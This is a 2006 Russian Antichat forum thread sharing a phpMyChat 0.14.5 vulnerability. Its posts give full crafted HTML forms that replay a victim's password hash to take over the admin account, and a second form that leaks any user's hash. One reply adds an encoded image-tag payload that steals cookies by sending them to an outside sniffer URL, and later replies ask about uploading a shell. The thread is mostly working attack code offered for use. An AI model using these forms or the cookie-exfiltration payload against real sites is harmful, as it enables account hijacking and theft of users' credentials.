ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Чаты
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

уязвимость в phpMyChat 0.14.5
  #1  
Старый 02.04.2006, 02:46
К.е.Н
Участник форума
Регистрация: 05.07.2005
Сообщений: 116
Провел на форуме:
177092

Репутация: 6
Отправить сообщение для К.е.Н с помощью ICQ
По умолчанию уязвимость в phpMyChat 0.14.5

Привет! Я нашел уязвимость в phpMyChat 0.14.5 ,и более поздние версии (может ее и до меня нашли, но вроде я таких уязвимостей не встречал). Суть в том: можно изменить пасс админу (любому пользователю), можно зайти под него ником в чат.
Для этого надо знать его ник и хеш (хеш не надо расшифровывать).
Допустим, мы узнали с помощью снифера хеш админа. Изменим ему пасс. Вот код страницы
Код:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML dir="LTR">

<HEAD>
<title>Книга посетителей</title>
<LINK REL="stylesheet" HREF="config/start_page.css.php3?Charset=windows-1251&medium=10&FontName=" TYPE="text/css">
<SCRIPT TYPE="text/javascript" LANGUAGE="JavaScript1.1">
<!--
function get_focus()
{
	window.focus();
	document.forms['LoginForm'].elements['AUTH_USERNAME'].focus();
}
// -->
</SCRIPT>
</HEAD>

<BODY onLoad="if (window.focus) get_focus();">
<CENTER>
<BR>
<FORM ACTION="http://www.site.ru/chat/edituser.php3" METHOD="POST" AUTOCOMPLETE="OFF" NAME="LoginForm">
<P></P>
<INPUT TYPE="hidden" NAME="L" VALUE="russian">
<INPUT TYPE="hidden" NAME="Link" VALUE="1">
<INPUT TYPE="hidden" NAME="LIMIT" VALUE="">
<TABLE BORDER=0 CELLPADDING=3 CLASS="table">
<TR>
	<TD ALIGN="CENTER">
		<TABLE BORDER=0>
		<TR>
			<TH COLSPAN=2 CLASS="tabtitle">Вход в ЧатВиллу</TH>
		</TR>
		<TR>
			<TD VALIGN="TOP" NOWRAP>Ник :</TD>
			<TD VALIGN="TOP">
				<INPUT TYPE="text" NAME="AUTH_USERNAME" SIZE=11 MAXLENGTH=10 VALUE="Pr13raK" CLASS="ChatBox">
			</TD>
		</TR>
		<TR>
			<TD VALIGN="TOP" NOWRAP>Пароль :</TD>
			<TD VALIGN="TOP">
				<INPUT TYPE="password" NAME="AUTH_PASSWORD" SIZE=11 MAXLENGTH=16 VALUE="310dcbbf4cce62f762a2aaa148d556bd" CLASS="ChatBox">
			</TD>
		</TR>
		</TABLE>
		<P>
		<INPUT TYPE="submit" VALUE="Входим" CLASS="ChatBox">
	</TD>
</TR>
</TABLE>
</FORM>
</CENTER>
</BODY>

</HTML>
Для этого в поле:<INPUT TYPE="text" NAME="AUTH_USERNAME" SIZE=11 MAXLENGTH=10 VALUE="" CLASS="ChatBox"> после слова VALUE пишем его ник.
В поле <INPUT TYPE="password" NAME="AUTH_PASSWORD" SIZE=11 MAXLENGTH=16 VALUE="" CLASS="ChatBox"> после слова VALUE пишем его хеш.
Все сохраняем страницу в html и нажимаем "Войти" меняем пасс можно и ник и теперь мы админы. Если что-то не понятно пишите kalnin2006@yandex.ru или стучите в асю: 255553398.
Извините если что не понятно это моя первая уязвимость!!!
"The pirats of a network" www.pirats.jino-net.ru
 
Ответить с цитированием

  #2  
Старый 02.04.2006, 12:21
ZINGER
Banned
Регистрация: 23.02.2006
Сообщений: 112
Провел на форуме:
659109

Репутация: 37
По умолчанию

хе-х, в этом " phpMyChat 0.14.5 " стока баг, что можно книгу написать... года 2-3 назад друг написал пхп скрипт через которую можно было кикнуть админа, стать модером и тд=)
на сколько я помню на античате есть видео по той баге которую ты описал, но и хеш не всегда можно узнать....
 
Ответить с цитированием

  #3  
Старый 02.04.2006, 22:48
DRON-ANARCHY
Отец порядка
Регистрация: 04.03.2005
Сообщений: 1,007
Провел на форуме:
1204641

Репутация: 412


Отправить сообщение для DRON-ANARCHY с помощью ICQ
По умолчанию

Дитё-инвалид вернулся!!! Ура!!!
=))))))))))))))))))))))))))
 
Ответить с цитированием

  #4  
Старый 03.04.2006, 09:18
К.е.Н
Участник форума
Регистрация: 05.07.2005
Сообщений: 116
Провел на форуме:
177092

Репутация: 6
Отправить сообщение для К.е.Н с помощью ICQ
По умолчанию

Мне стали задавать вопрос: «Как узнать хеш админа, если он не появляется в чате?".
Узнать можно. И не только админа, а можно и любого модера или юзера. Вот код страницы:
Код:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML dir="LTR">

<HEAD>
<title>Книга посетителей</title>
<LINK REL="stylesheet" HREF="config/start_page.css.php3?Charset=windows-1251&medium=10&FontName=" TYPE="text/css">
<SCRIPT TYPE="text/javascript" LANGUAGE="JavaScript1.1">
<!--
function get_focus()
{
	window.focus();
	document.forms['LoginForm'].elements['AUTH_USERNAME'].focus();
}
// -->
</SCRIPT>
</HEAD>

<BODY onLoad="if (window.focus) get_focus();">
<CENTER>
<BR>
<FORM ACTION="http://www.site.ru/chat/admin.php3" METHOD="POST" AUTOCOMPLETE="OFF" NAME="LoginForm">
<P></P>
<P><SPAN CLASS="error">Неправильный ник или пароль.</SPAN></P><INPUT TYPE="hidden" NAME="L" VALUE="russian">
<INPUT TYPE="hidden" NAME="Link" VALUE="">
<INPUT TYPE="hidden" NAME="LIMIT" VALUE="">
<TABLE BORDER=0 CELLPADDING=3 CLASS="table">
<TR>
	<TD ALIGN="CENTER">
		<TABLE BORDER=0>
		<TR>
			<TH COLSPAN=2 CLASS="tabtitle">Вход в ЧатВиллу</TH>
		</TR>
		<TR>
			<TD VALIGN="TOP" NOWRAP>Ник :</TD>
			<TD VALIGN="TOP">
				<INPUT TYPE="text" NAME="AUTH_USERNAME" SIZE=11 MAXLENGTH=10 VALUE="Lady_Ann" CLASS="ChatBox">
			</TD>
		</TR>
		<TR>
			<TD VALIGN="TOP" NOWRAP>Пароль :</TD>
			<TD VALIGN="TOP">
				<INPUT TYPE="password" NAME="AUTH_PASSWORD" SIZE=11 MAXLENGTH=16 VALUE="Lady_Ann" CLASS="ChatBox">
			</TD<!-- INSERT -->
<INPUT type="hidden" name="do_not_login" value="false">
<!-- END INSERT -->
		</TR>
		</TABLE>
		<P>
		<INPUT TYPE="submit" VALUE="Входим" CLASS="ChatBox">
	</TD>
</TR>
</TABLE>
</FORM>
</CENTER>
</BODY>

</HTML>
В строчке <INPUT TYPE="text" NAME="AUTH_USERNAME" SIZE=11 MAXLENGTH=10 VALUE="Lady_Ann" CLASS="ChatBox"> после VALUE= Пишем ник
В строчке <INPUT TYPE="password" NAME="AUTH_PASSWORD" SIZE=11 MAXLENGTH=16 VALUE="Lady_Ann" CLASS="ChatBox"> после VALUE= тоже пишем этот же ник. А не хеш.
Нажимаем "Вход" и видим, ник и пас в виде звездочек. Теперь просматриваем страницу в HTML и ищем строчку <INPUT TYPE="password" NAME="AUTH_PASSWORD" SIZE=11 MAXLENGTH=16 VALUE="342353564asas34523523" CLASS="ChatBox">
Теперь уже после VALUE= будет не ник, а хеш пользователя.
"The pirats of a network" www.pirats.jino-net.ru
 
Ответить с цитированием

  #5  
Старый 03.04.2006, 09:20
К.е.Н
Участник форума
Регистрация: 05.07.2005
Сообщений: 116
Провел на форуме:
177092

Репутация: 6
Отправить сообщение для К.е.Н с помощью ICQ
По умолчанию

!!!!!!!!!!!!!!!хе-х, в этом " phpMyChat 0.14.5 " стока баг, что можно книгу написать... года 2-3 назад друг написал пхп скрипт через которую можно было кикнуть админа, стать модером и тд=)
на сколько я помню на античате есть видео по той баге которую ты описал, но и хеш не всегда можно узнать....!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
Здесь есть видеоно только не по этой баге.Видео о том, как вставлять в чате теги
 
Ответить с цитированием

  #6  
Старый 03.04.2006, 09:49
Barsik
Постоянный
Регистрация: 16.01.2005
Сообщений: 300
Провел на форуме:
3463790

Репутация: 726
Отправить сообщение для Barsik с помощью ICQ Отправить сообщение для Barsik с помощью MSN
По умолчанию

Давно уже эта уязвимость есть! Вот даже видео
http://video.antichat.ru/file71.html
А так воруем куки
Код HTML:
\x3cimg src="http\x3a//antichat.ru/cgi-bin/s.jpg" name="imaga"\x3e
Где http\x3a//antichat.ru/cgi-bin/s.jpg = Путь к сниффу. На данный момент куки прилетят на сниффер Ачата http://antichat.ru/sniff/log.php

Последний раз редактировалось Barsik; 03.04.2006 в 09:53..
 
Ответить с цитированием

  #7  
Старый 03.04.2006, 22:15
m0nzt3r
ветеран
Регистрация: 22.06.2004
Сообщений: 2,128
Провел на форуме:
5355463

Репутация: 2258


По умолчанию

инвалид по-моему эта бага давно паблик и была найдена
__________________
Elite VPN from Green. Quality. Click and buy!!!

Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze
 
Ответить с цитированием

  #8  
Старый 26.03.2007, 08:43
Phen1x
Новичок
Регистрация: 21.05.2006
Сообщений: 20
Провел на форуме:
404362

Репутация: 35
По умолчанию

А шел можно как нибудь залить ?
 
Ответить с цитированием

  #9  
Старый 07.04.2007, 00:56
xPriZrAkx
Познающий
Регистрация: 16.03.2007
Сообщений: 48
Провел на форуме:
293334

Репутация: 39
По умолчанию

vot ya zaidy v chat i kyda mne vstavit etot Cod Stratichki?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
phpMyChat 0.14.5 Grema Чаты 4 05.01.2006 11:46
Есть ли уязвимость в форумах созданных на http://www.1bb.ru/ ? bike Форумы 2 24.12.2005 17:28
Уязвимость в iChat'е. -SX- Болталка 0 15.01.2005 23:46
Phpmychat 0.14.5 Чаты 0 26.06.2004 11:05
Phpmychat 0.14.5 Уязвимости 0 26.06.2004 11:05



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ